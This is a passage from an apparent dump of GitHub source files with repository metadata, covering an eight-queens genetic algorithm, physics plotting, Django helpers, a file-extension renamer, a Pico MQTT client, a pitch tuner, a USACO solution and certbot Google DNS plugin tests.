setGene(self, idx, valor):\n\t\tself._data[idx] = valor\n\n\tdef getData(self):\n\t\treturn self._data\n\n\tdef __getitem__(self, idx):\n\t\treturn self._data[idx]\n\n\tdef size(self):\n\t\treturn len(self._data)\n\n\tdef __repr__(self):\n\t\treturn str(self._data)\n\n\tdef _boundsOK(self, i, j):\n\t\tif (i < self.size() and i >= 0 and j < self.size() and j >= 0):\n\t\t\treturn True\n\t\treturn False\n\n\n\t# numero de colisoes\n\tdef getAvaliacao(self):\n\t\tcolisoes = 0\n\n\t\tfor i in range(self.size()):\n\t\t\t# diagonal principal superior\n\t\t\tfor l in range(self.size()):\n\t\t\t\t# Diag Sup or Diag Inf or Diga Inv Sup or Diag Inv Inf\n\t\t\t\tif ( ( self._boundsOK( i - (l + 1), self._data[i] + (l + 1) ) and self._data[i - (l + 1)] == self._data[i] + (l + 1) ) or\n\t\t\t\t( self._boundsOK( i + (l + 1), self._data[i] - (l + 1) ) and self._data[i + (l + 1)] == self._data[i] - (l + 1) ) or\n\t\t\t\t( self._boundsOK( i - (l + 1), self._data[i] - (l + 1) ) and self._data[i - (l + 1)] == self._data[i] - (l + 1) ) or\n\t\t\t\t( self._boundsOK( i + (l + 1), self._data[i] + (l + 1) ) and self._data[i + (l + 1)] == self._data[i] + (l + 1) ) ):\n\t\t\t\t\tcolisoes+= 1\n\t\treturn colisoes\n\n\tdef cruzamento(self, outro):\n\t\t# olhar funcao de cruzamento do PCV-PQ\n\n\t\tpontoFlutuante = random.randint(1, self.size() - 1)\n\n\t\tf1 = self._data[0:pontoFlutuante]\n\t\tf2 = outro[0:pontoFlutuante]\n\n\t\tverif1 = [0] * self.size()\n\t\tverif2 = [0] * self.size()\n\n\t\tfor i in range(pontoFlutuante):\n\t\t\tverif1[f1[i]] = 1\n\t\t\tverif2[f2[i]] = 1\n\n\t\tfor i in range(self.size()):\n\t\t\t# if outro[i] not in f1:\n\t\t\t# \tf1.append(outro[i])\n\t\t\t# if self._data[i] not in f2:\n\t\t\t# \tf2.append(self._data[i])\n\t\t\tif verif1[outro[i]] == 0:\n\t\t\t\tf1.append(outro[i])\n\t\t\tif verif2[self._data[i]] == 0:\n\t\t\t\tf2.append(self._data[i])\n\n\t\tx = Cromossomo(self.size())\n\t\tx.setData(f1)\n\t\tx.setTaxaMutacao(random.random())\n\n\t\ty = Cromossomo(self.size())\n\t\ty.setData(f2)\n\t\ty.setTaxaMutacao(random.random())\n\n\t\treturn [x, y]\n\n\tdef mutacao(self, taxaMutacao):\n\t\tif taxaMutacao <= self._taxaMutacao:\n\t\t\tidx1 = random.randint(0, self.size() - 1)\n\t\t\tidx2 = random.randint(0, self.size() - 1)\n\n\t\t\taux = self._data[idx1]\n\t\t\tself._data[idx1] = self._data[idx2]\n\t\t\tself._data[idx2] = aux\n\nclass Genetico:\n\n\t# popSize - tamanho da populacao\n\t# txMutacao - taxa de mutacao (0 a 1)\n\t# porcentCruzamento - procentagem da populacao para fazer cruzamento (0 a 100)\n\t# geracoes - numero de geracoes\n\n\tdef __init__(self, popSize, txMutacao, porcentCruzamento, geracoes, tamanhoTabuleiro):\n\t\t#parametros\n\t\tself._populacao = []\n\t\tself._popSize = popSize\n\t\tself._txMutacao = txMutacao\n\t\tself._geracoes = 0\n\t\tself._cruzamentos = int ( (porcentCruzamento/100.0) * self._popSize ) // 2\n\t\tself._tamanhoTabuleiro = tamanhoTabuleiro\n\n\tdef run(self):\n\n\t\tself.gerarPopulacaoInicial()\n\t\tself._populacao.sort(key=operator.methodcaller(\"getAvaliacao\"), reverse=False)\n\n\t\twhile self._geracoes < geracoes :\n\t\t\t#print \"POP da iteracao: \", self._geracoes\n\t\t\t#print self.printPop()\n\t\t\tself._geracoes+= 1\n\t\t\t# print (self.aptdMedia())\n\t\t\t# print 'geracao ', self._geracoes\n\t\t\tfor i in range(self._cruzamentos/2):\n\n\t\t\t\t# indA = self.roleta()\n\t\t\t\t# indB = self.roleta()\n\t\t\t\tindA = self._populacao[i]\n\t\t\t\tindB = self._populacao[i + 1]\n\n\t\t\t\t#Reproducao\n\t\t\t\tfilhos = indA.cruzamento(indB)\n\t\t\t\tfilhos[0].mutacao(self._txMutacao)\n\t\t\t\tfilhos[1].mutacao(self._txMutacao)\n\n\t\t\t\tself._populacao.append(filhos[0])\n\t\t\t\tself._populacao.append(filhos[1])\n\n\t\t\tself.selecao()\n\t\t\tif self._populacao[0].getAvaliacao() == 0:\n\t\t\t\tbreak\n\t\t\t#print \"aqui2\"\n\n\t\t#return self.getSolucaoDeElite()\n\t\t#print self.printPop()\n\t\treturn self._populacao[0]\n\n\tdef getPopulacao(self):\n\t\treturn self._populacao\n\n\tdef gerarPopulacaoInicial(self):\n\t\tfor i in range(0, self._popSize + 1):\n\t\t\tself._populacao.append(Cromossomo(self._tamanhoTabuleiro))\n\n\tdef roleta(self):\n\t\t# x = soteira num 0 - soma\n\t\t# subtrai dos x os valores dos individuos ate que x assuma um valor <=0, there is the guy\n\t\tsoma = 0.0\n\t\tfor i in range(len(self._populacao)):\n\t\t\tif self._populacao[i].getAvaliacao() > 0:\n\t\t\t\tsoma+= 1.0/self._populacao[i].getAvaliacao()\n\t\t\telse:\n\t\t\t\tsoma+= 1;\n\t\tx = random.random() * soma\n\n\t\ti = 0\n\t\twhile x >= 0 and i < len(self._populacao):\n\t\t\tif self._populacao[i].getAvaliacao() > 0:\n\t\t\t\tx-= 1.0/self._populacao[i].getAvaliacao()\n\t\t\telse:\n\t\t\t\tx-= 1.0\n\t\t\ti+= 1\n\t\treturn self._populacao[i - 1]\n\n\n\tdef elite(self):\n\t\t#print \"Pop anterior: \"\n\t\t#print self.printPop()\n\t\tself._populacao.sort(key=operator.methodcaller(\"getAvaliacao\"), reverse=False)\n\t\tself._populacao = self._populacao[0:self._popSize + 1]\n\t\t#print \"Pop pos:\"\n\t\t#print self.printPop()\n\t\treturn self._populacao\n\n\tdef getSolucaoDeElite(self):\n\t\tbestSol = sys.maxint\n\t\tfor i in range(len(self._populacao)):\n\t\t\t# print self._populacao[i] , \" -- \", self._populacao[i].getAvaliacao()\n\t\t\tif self._populacao[i].getAvaliacao() < bestSol:\n\t\t\t\tbestSol = self._populacao[i]\n\n\t\treturn bestSol\n\n\n\tdef selecao(self):\n\t\topt = 1\n\t\tif opt == 0:\n\t\t\tnewPop = []\n\t\t\twhile len(newPop) != self._popSize:\n\t\t\t\tnewPop.append(self.roleta())\n\t\t\tself._populacao = newPop\n\t\telse:\n\t\t\treturn self.elite()\n\n\tdef printPop(self):\n\t\tstring = ''\n\t\tfor i in range(0, len(self._populacao)):\n\t\t\tstring+= str(i) + '-' + str(self._populacao[i]) + ' - ' + str(self._populacao[i].getAvaliacao()) + '\\n'\n\t\treturn string\n\n\tdef aptdMedia(self):\n\t\tmd = 0;\n\t\tfor i in range(0, len(self._populacao)):\n\t\t\tmd+= self._populacao[i].getAvaliacao()\n\t\t#print \"soma:\", md\n\t\t#print \"len:\", len(self._populacao)\n\t\tmd/=(len(self._populacao) * 1.0)\n\t\t#print \"media: \", md\n\t\treturn md\n\n# popSize - tamanho da populacao\n# txMutacao - taxa de mutacao (0 a 1)\n# porcentCruzamento - procentagem da populacao para fazer cruzamento (0 a 100)\n# geracoes - numero de geracoes\n\n# pyhton genetico8rainhas.py 200 0.5 50 500\n# print sys.argv\npopSize = int(sys.argv[1])\ntxMutacao = float(sys.argv[2])\nporcentCruzamento = int(sys.argv[3])\ngeracoes = int(sys.argv[4])\ntamanhoTabuleiro = 8\n\n#popSize = 200\n#txMutacao = 0.5\n#porcentCruzamento = 50\n#geracoes = 500\n#tamanhoTabuleiro = 8\nmelhor_tempo = sys.float_info.max\npior_tempo = sys.float_info.min\ntempo_medio = 0.0\nnum_sol_val = 0\nmediaAptdMedia = 0.0\nRODADAS = 10\nmelhorApt = sys.float_info.max\n\nfor i in range(0, RODADAS):\n\t#start_time = time.time()\n\tg = Genetico(popSize, txMutacao, porcentCruzamento, geracoes, tamanhoTabuleiro)\n\tsol = g.run()\n\t#print g.aptdMedia()\n\tmediaAptdMedia+= g.aptdMedia()\n\t#time_atual = (time.time() - start_time)\n\t#tempo_medio+= time_atual\n\t#if time_atual < melhor_tempo:\n\t#\tmelhor_tempo = time_atual\n\t#if time_atual > pior_tempo:\n\t#\tpior_tempo = time_atual\n\t#if sol.getAvaliacao() == 0:\n\t#\tnum_sol_val+= 1\n\t#if g.aptdMedia() < melhorApt:\n\t#\tmelhorApt = g.aptdMedia()\n\n\n#tempo_medio/=RODADAS\nmediaAptdMedia/=RODADAS\n#print(\"%.3f, %.3f, %.3f, %.3f, %.3f, %i\" %(melhor_tempo, pior_tempo, tempo_medio, mediaAptdMedia, melhorApt, num_sol_val))\nprint (\"%.3f\" % mediaAptdMedia)\n#print melhor_tempo, \", \", pior_tempo, \", \", tempo_medio, \", \", num_sol_val\n#print (\"%.3f\" % total_time)\n\n#print(\"%s\" % (time.time() - start_time))\n\n#print sol, sol.getAvaliacao()\n","repo_name":"jeansantana/desafio8Rainhas","sub_path":"genetico8rainhas.py","file_name":"genetico8rainhas.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74476157640","text":"#!/usr/bin/env python3\nimport sys, os\nimport numpy as np\nfrom math import *\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as cls\nfrom matplotlib.ticker import FormatStrFormatter\nimport matplotlib.ticker as ticker\n\ngdata = np.loadtxt('../grids/WHL_M2_mu.grid')\n\ninput_dir = '../slha_files/WHL_M2_mu'\n#input_dir = '../decay_out/MSSM/WHL_M2_mu'\n\nmWino = 398\n\nmu_ar, mN1_ar, mN2_ar, mC1_ar = [], [], [], []\nfor g in gdata:\n x, y = int(g[0]), int(g[1])\n\n if x != mWino: continue \n\n mN1, mC1 = -1, -1\n tag_N1, tag_C1 = '--'*10, '**'*10\n for line in open('{}/WHL_M2_mu_{}_{}.spec'.format(input_dir, x, y)):\n elems = line.split()\n if len(elems) < 3: continue\n if elems[0] == '1000022': \n mN1 = float(elems[1])\n tag_N1 = elems[3]\n if elems[0] == '1000023': \n mN2 = abs(float(elems[1]))\n tag_N1 = elems[3]\n if elems[0] == '1000024': \n mC1 = float(elems[1])\n tag_C1 = elems[3]\n break \n #print(mN1, mN2, mC1, tag_N1, tag_C1)\n #mdif = (mC1 - mN1)*1000\n mu_ar.append(y)\n mN1_ar.append(mN1)\n mN2_ar.append(mN2)\n mC1_ar.append(mC1)\n\nmu_ar = np.array(mu_ar)\nmN1_ar = np.array(mN1_ar)\nmN2_ar = np.array(mN2_ar)\nmC1_ar = np.array(mC1_ar)\n\n##################################################\n#fig = plt.figure(figsize=(8,5))\n#ax = fig.add_subplot(111) \n#fig.subplots_adjust(bottom=0.15, right=0.8, top=0.94, left=0.2)\n\nfig = plt.figure()\nax = fig.add_subplot(111) \nfig.subplots_adjust(bottom=0.15, right=0.8, top=0.94, left=0.2)\nax.xaxis.set_ticks_position('both')\nax.yaxis.set_ticks_position('both')\n\n\nfs = 18\n\n# cm = plt.cm.get_cmap('RdYlBu')\n# #sc = ax.scatter(xar, yar, c=zar, norm=cls.LogNorm(), cmap=cm)\n# sc = ax.scatter(xar, yar, c=zar, vmin=80, vmax=1000, cmap=cm)\n#fig.colorbar(sc, label='$\\Delta m$ [MeV]')\n\n#ax.plot(mu_ar, mN1_ar, c='r') \nlw = 2\n#ax.plot(mu_ar, mN2_ar - mN1_ar, c='r', ls='-.', lw=lw, label=r'$m_{N2} - m_{N1}$') \n#ax.plot(mu_ar, mC1_ar - mN1_ar, c='b', ls='-.', lw=lw, labal=r'$m_{C1} - m_{N1}$') \np1=ax.plot(mu_ar, mN2_ar - mN1_ar, c='r', label=r'$m_{N2} - m_{N1}$') \np2=ax.plot(mu_ar, mC1_ar - mN1_ar, c='b', label=r'$m_{C1} - m_{N1}$') \n\nax.set_xlim([200, 1000])\n#ax.set_ylim([200, 600])\n\n#ax.set_xscale('log')\nax.set_yscale('log')\n\nax.set_xlabel(r'$\\mu$ [GeV]', fontsize=fs)\nax.set_ylabel(r'$\\Delta m$ [GeV]', fontsize=fs) \n\nax.legend(loc='upper left', fontsize=13)\n\n#ax.set_title('$\\Delta m$ [MeV] (GM2CALC)', fontsize=fs)\n#pdfname = 'delM_GM2C.pdf'\n\nax.set_title(r'$M_2 = 398\\,{\\rm GeV}$', fontsize=16)\npdfname = 'mEWK.pdf'\n\n\nfig.savefig(pdfname, bbox_inches = 'tight', pad_inches = 0.1)\nprint(pdfname)\nprint('here')\nexit()\n\n\nexit()\n\n","repo_name":"kazuki-sakurai/g-2EWKplots","sub_path":"disappearing/plot_mEWK.py","file_name":"plot_mEWK.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16701009218","text":"from django import template\n\nregister = template.Library()\n\n\n@register.tag(name=\"wishlists_containing_product\")\ndef do_basket_form(parse, token):\n \"\"\"\n Template tag for adding the user's wishlists form to the\n template context so it can be rendered.\n \"\"\"\n tokens = token.split_contents()\n if len(tokens) != 5:\n raise template.TemplateSyntaxError(\n \"%r tag uses the following syntax: \"\n \"{%% wishlists_containing_product wishlists product as \"\n \"ctx_var %%}\" % tokens[0])\n\n wishlists_var, product_var, name_var = tokens[1], tokens[2], tokens[4]\n return ProductWishlistsNode(\n wishlists_var, product_var, name_var)\n\n\nclass ProductWishlistsNode(template.Node):\n def __init__(self, wishlists_var, product_var, name_var):\n self.wishlists_var = template.Variable(wishlists_var)\n self.product_var = template.Variable(product_var)\n self.name_var = name_var\n\n def render(self, context):\n try:\n wishlists = self.wishlists_var.resolve(context)\n product = self.product_var.resolve(context)\n except template.VariableDoesNotExist:\n return ''\n context[self.name_var] = wishlists.filter(\n lines__product=product)\n return ''\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/17130_wishlist_tags.py","file_name":"17130_wishlist_tags.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"35904168634","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'subscription', views.SubscriptionViewSet, basename='subscription')\n\n\nurlpatterns = [\n path('api/alternative/', include(router.urls)),\n path('api/subscription/', views.SubscriptionsListAddViews.as_view(), name='subscriptions'),\n path('api/subscription//', views.SubscriptionsDellViews.as_view(), name='delete_subscription'),\n path('api/report//', views.ProductReport.as_view(), name='product_report'),\n]\n","repo_name":"velPavelTest/fullstatsApi","sub_path":"wildwatch/watch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36987711550","text":"import sys\nimport os\n\nfile_dir = sys.argv[-1]\n\nfile_list = os.listdir(file_dir)\nold_format = raw_input(\"Enter the format you want to change: \")\nnew_format = raw_input(\"Enter the new format: \")\nconverted = 0\nfor names in file_list:\n splitted = names.split('.')\n if splitted[-1] == old_format:\n splitted.remove(old_format)\n splitted.append(new_format)\n new_name = '.'.join(splitted)\n old_name = os.path.join(file_dir, names)\n newest = os.path.join(file_dir, new_name)\n os.rename(old_name, newest)\n converted += 1\nprint('%s files converted from %s to %s' %(converted, old_format, new_format))\n\n# total = len(sys.argv)\n# cmdargs = str(sys.argv)\n# print(\"The total number of system arguments is %d\" %total)\n# print(\"Args list: %s\" % cmdargs)\n","repo_name":"Favouroked/FormatChange","sub_path":"formatchange.py","file_name":"formatchange.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39078761373","text":"'''\n\nWrite a program to return the difference between the largest and smallest number from an array of positive integers.\n\ninput1: 5\ninput2: 10 11 7 12 14\n\nOutput:\n--------\n\n7\n\n'''\n\ndef findLargeSmallDifference(input1):\n input2 = []\n diffrence = 0 \n input2 = list(map(int, input(\"enter the element sparate by value: \").strip().split(\" \")))[:input1]\n for i in range(len(input2)-1):\n for j in range(len(input2)-1):\n if input2[j] > input2[j+1]:\n input2[j],input2[j+1] = input2[j+1],input2[j]\n else:\n diffrence = input2[len(input2)-1] - input2[0]\n print(diffrence)\n \ninput1 = int(input(\"Enter the Number of element: \"))\nfindLargeSmallDifference(input1)","repo_name":"Subharanjan-Sahoo/Practice-Questions","sub_path":"Tech Mahindra/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70795172680","text":"# Raspberry Pi Pico - MQTT Client PubSub\r\n# Datei: buch2-rpi-picoW-kap7-mqtt-topic-pub.py\r\n\r\n# Bibliothek\r\nimport time\r\nimport network\r\nfrom umqttsimple import MQTTClient\r\nimport urequests\r\n\r\n#WLAN\r\nwlan = network.WLAN(network.STA_IF)\r\nwlan.active(True)\r\nwlan.connect('MeinWLAN','MeinPasswort')\r\n\r\n\r\n#MQTT Konfiguration\r\nmqtt_server = '192.168.1.42'\r\nclient_id = 'pico'\r\ntopic_pub = \"RPIPico\"\r\ntopic_msg = \"Hello Pico...\"\r\n\r\n#Funktionen\r\ndef mqtt_connect():\r\n client = MQTTClient(client_id, mqtt_server, keepalive=60)\r\n client.connect()\r\n print('Verbunden mit %s MQTT Broker'%(mqtt_server))\r\n return client\r\n\r\ndef callback(topic, msg):\r\n t = topic.decode(\"utf-8\").lstrip(topic)\r\n print(t) \r\n\r\ndef reconnect():\r\n print('Fehler beim Verbinden mit MQTT Broker. Verbindungsaufbau...')\r\n time.sleep(5)\r\n\r\n#MQTT Loop\r\ntry:\r\n client = mqtt_connect()\r\nexcept OSError as e:\r\n reconnect()\r\nwhile True:\r\n client = mqtt_connect()\r\n client.publish(topic_pub, topic_msg)\r\n client.set_callback(callback)\r\n time.sleep(3)\r\n client.disconnect()","repo_name":"arduinopraxis/Buch-RPi-Pico-2","sub_path":"buch2-rpi-picoW-kap7-mqtt-topic-pub.py","file_name":"buch2-rpi-picoW-kap7-mqtt-topic-pub.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"17561273833","text":"from __future__ import print_function\nimport pyaudio, aubio, wave\nimport sys, time, getopt\nimport numpy as num\nimport math\nimport utility\n\nclass Tuner:\n __A4 = 440\n __C0 = 0\n __base_octave = {}\n __data_stream = None\n __pitch_detector = None\n __tolerance = 0\n __accuracy = 0\n\n def __init__(self, A4=440, tolerance = 0.1, accuracy = 5):\n self.__data_stream = utility.initStream()\n self.__pitch_detector = utility.initDetector()\n self.__A4 = A4\n self.__tolerance = tolerance\n self.__accuracy = accuracy\n self.calculateC0()\n self.initBaseOctave()\n\n def calculateC0(self):\n self.__C0 = self.__A4 * pow(2, -4.75)\n\n def initBaseOctave(self):\n temp = self.__C0\n for x in utility.name:\n self.__base_octave[x] = temp\n temp = temp * pow(2, 1.0/12) \n\n def setA4(self, A4):\n self.__A4 = A4\n self.calculateC0()\n self.initBaseOctave()\n\n def getA4(self):\n return self.__A4\n\n def getData(self):\n data = self.__data_stream.read(1024)\n samples = num.fromstring(data, dtype=aubio.float_type)\n pitch = self.__pitch_detector(samples)[0]\n\n errorper = 0\n error= 0\n note = 0\n octave = 0\n \n if pitch != 0: \n note,octave = utility.findnote(pitch, self.__C0)\n \n expected = self.__base_octave[note] * pow(2, octave)\n error = pitch - expected\n \n if error > 0:\n margin = expected * (pow(2,1.0/24) - 1)\n else:\n margin = expected * (1 - pow(2,-1.0/24))\n \n errorper = abs(error) / margin\n\n return errorper, error, pitch, note, octave\n\n\n def run(self):\n tolerance = self.__tolerance\n accuracy = self.__accuracy\n while True:\n errorper, error, pitch, note, octave = self.getData()\n \n if pitch!= 0: \n output = \"Pitch:\" + str(pitch) + \"Hz Note:\" + note + str(octave) + \" \"\n \n if errorper > 1:\n print(\"Error greater than 100% at pitch : \" + pitch)\n exit()\n if errorper <= tolerance:\n print (accuracy * \" .\" + utility.colorize(\" ^ \", errorper, tolerance) + accuracy * \". \" + output + '\\r',end = '')\n else:\n if error > 0:\n pre = accuracy * \" .\" + \" \"\n pos = int(math.ceil(accuracy*errorper))\n post = (pos - 1) * \" .\" + utility.colorize(\" <\", errorper, tolerance) + (accuracy - pos) * \" .\"\n else:\n post = accuracy * \" .\"\n pos = accuracy - int(math.ceil(accuracy*errorper)) + 1\n pre = \" \" + (pos - 1) * \". \" + utility.colorize(\"> \", errorper, tolerance) + (accuracy - pos) * \". \"\n \n print (pre + \"|\" + post + \" \" + output + '\\r', end = '')\n sys.stdout.flush()\n","repo_name":"iliastsa/py-chromatic-tuner","sub_path":"src/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5026616429","text":"# time = 32 min\ndef open_file():\n fin = open('factory.in')\n belts = []\n count = 1\n for line in fin:\n line = line.strip()\n if count == 1:\n n = int(line)\n else:\n belts.append(map(lambda x: int(x), line.split(\" \")))\n count += 1\n fin.close()\n return n, belts\n\n\ndef check_if_leads(goal, in_out_list, n):\n if n == goal:\n return True\n else:\n try:\n for i in in_out_list:\n if i[0] == n:\n x = i[1]\n break\n check_if_leads(goal, in_out_list, x)\n except:\n return False\n\n\ndef find_answer(stage):\n n = stage[0]\n belts = stage[1]\n answer = -1\n changes = 0\n works = True\n for i in range(n):\n for target in belts:\n if i+1 != target[0]:\n pass\n else:\n works = False\n break\n if works:\n answer = i+1\n changes += 1\n works = True\n if changes >= 2:\n return -1\n return answer\n# answer = i+1\n# for target in range(n-1):\n# if i == target:\n# pass\n# else:\n# if not check_if_leads(i+1, belts, target+1):\n# pass\n# else:\n# answer = -1\n# works = False\n# break\n# if works:\n# return answer\n\n\ndef close_file(answer):\n fout = open(\"factory.out\", \"w\")\n fout.write(\"{}\".format(answer))\n fout.close()\n\n\nclose_file(find_answer(open_file()))\n","repo_name":"DaChosens1/usaco","sub_path":"2019/March/milkfactory_march_19_bronze/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16683459658","text":"\"\"\"Tests for certbot_dns_google.dns_google.\"\"\"\n\nimport os\nimport unittest\n\nimport mock\nfrom googleapiclient.errors import Error\nfrom httplib2 import ServerNotFoundError\n\nfrom certbot import errors\nfrom certbot.errors import PluginError\nfrom certbot.plugins import dns_test_common\nfrom certbot.plugins.dns_test_common import DOMAIN\nfrom certbot.tests import util as test_util\n\nACCOUNT_JSON_PATH = '/not/a/real/path.json'\nAPI_ERROR = Error()\nPROJECT_ID = \"test-test-1\"\n\n\nclass AuthenticatorTest(test_util.TempDirTestCase, dns_test_common.BaseAuthenticatorTest):\n\n def setUp(self):\n super(AuthenticatorTest, self).setUp()\n\n from certbot_dns_google.dns_google import Authenticator\n\n path = os.path.join(self.tempdir, 'file.json')\n open(path, \"wb\").close()\n\n super(AuthenticatorTest, self).setUp()\n self.config = mock.MagicMock(google_credentials=path,\n google_propagation_seconds=0) # don't wait during tests\n\n self.auth = Authenticator(self.config, \"google\")\n\n self.mock_client = mock.MagicMock()\n # _get_google_client | pylint: disable=protected-access\n self.auth._get_google_client = mock.MagicMock(return_value=self.mock_client)\n\n def test_perform(self):\n self.auth.perform([self.achall])\n\n expected = [mock.call.add_txt_record(DOMAIN, '_acme-challenge.'+DOMAIN, mock.ANY, mock.ANY)]\n self.assertEqual(expected, self.mock_client.mock_calls)\n\n def test_cleanup(self):\n # _attempt_cleanup | pylint: disable=protected-access\n self.auth._attempt_cleanup = True\n self.auth.cleanup([self.achall])\n\n expected = [mock.call.del_txt_record(DOMAIN, '_acme-challenge.'+DOMAIN, mock.ANY, mock.ANY)]\n self.assertEqual(expected, self.mock_client.mock_calls)\n\n @mock.patch('httplib2.Http.request', side_effect=ServerNotFoundError)\n def test_without_auth(self, unused_mock):\n self.config.google_credentials = None\n self.assertRaises(PluginError, self.auth.perform, [self.achall])\n\n\nclass GoogleClientTest(unittest.TestCase):\n record_name = \"foo\"\n record_content = \"bar\"\n record_ttl = 42\n zone = \"ZONE_ID\"\n change = \"an-id\"\n\n def _setUp_client_with_mock(self, zone_request_side_effect):\n from certbot_dns_google.dns_google import _GoogleClient\n\n client = _GoogleClient(ACCOUNT_JSON_PATH)\n\n # Setup\n mock_mz = mock.MagicMock()\n mock_mz.list.return_value.execute.side_effect = zone_request_side_effect\n\n mock_changes = mock.MagicMock()\n\n client.dns.managedZones = mock.MagicMock(return_value=mock_mz)\n client.dns.changes = mock.MagicMock(return_value=mock_changes)\n\n return client, mock_changes\n\n @mock.patch('googleapiclient.discovery.build')\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google._GoogleClient.get_project_id')\n def test_client_without_credentials(self, get_project_id_mock, credential_mock,\n unused_discovery_mock):\n from certbot_dns_google.dns_google import _GoogleClient\n _GoogleClient(None)\n self.assertFalse(credential_mock.called)\n self.assertTrue(get_project_id_mock.called)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n @mock.patch('certbot_dns_google.dns_google._GoogleClient.get_project_id')\n def test_add_txt_record(self, get_project_id_mock, credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n credential_mock.assert_called_once_with('/not/a/real/path.json', mock.ANY)\n self.assertFalse(get_project_id_mock.called)\n\n client.add_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n expected_body = {\n \"kind\": \"dns#change\",\n \"additions\": [\n {\n \"kind\": \"dns#resourceRecordSet\",\n \"type\": \"TXT\",\n \"name\": self.record_name + \".\",\n \"rrdatas\": [self.record_content, ],\n \"ttl\": self.record_ttl,\n },\n ],\n }\n\n changes.create.assert_called_with(body=expected_body,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_and_poll(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n changes.create.return_value.execute.return_value = {'status': 'pending', 'id': self.change}\n changes.get.return_value.execute.return_value = {'status': 'done'}\n\n client.add_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n changes.create.assert_called_with(body=mock.ANY,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n changes.get.assert_called_with(changeId=self.change,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_error_during_zone_lookup(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock(API_ERROR)\n\n self.assertRaises(errors.PluginError, client.add_txt_record,\n DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_zone_not_found(self, unused_credential_mock):\n client, unused_changes = self._setUp_client_with_mock([{'managedZones': []},\n {'managedZones': []}])\n\n self.assertRaises(errors.PluginError, client.add_txt_record,\n DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_add_txt_record_error_during_add(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n changes.create.side_effect = API_ERROR\n\n self.assertRaises(errors.PluginError, client.add_txt_record,\n DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record(self, unused_credential_mock):\n client, changes = self._setUp_client_with_mock([{'managedZones': [{'id': self.zone}]}])\n\n client.del_txt_record(DOMAIN, self.record_name, self.record_content, self.record_ttl)\n\n expected_body = {\n \"kind\": \"dns#change\",\n \"deletions\": [\n {\n \"kind\": \"dns#resourceRecordSet\",\n \"type\": \"TXT\",\n \"name\": self.record_name + \".\",\n \"rrdatas\": [self.record_content, ],\n \"ttl\": self.record_ttl,\n },\n ],\n }\n\n changes.create.assert_called_with(body=expected_body,\n managedZone=self.zone,\n project=PROJECT_ID)\n\n @mock.patch('oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name')\n @mock.patch('certbot_dns_google.dns_google.open',\n mock.mock_open(read_data='{\"project_id\": \"' + PROJECT_ID + '\"}'), create=True)\n def test_del_txt_record_error_during_zone_lookup(self, unused_credential_mock):\n client, unused_changes = 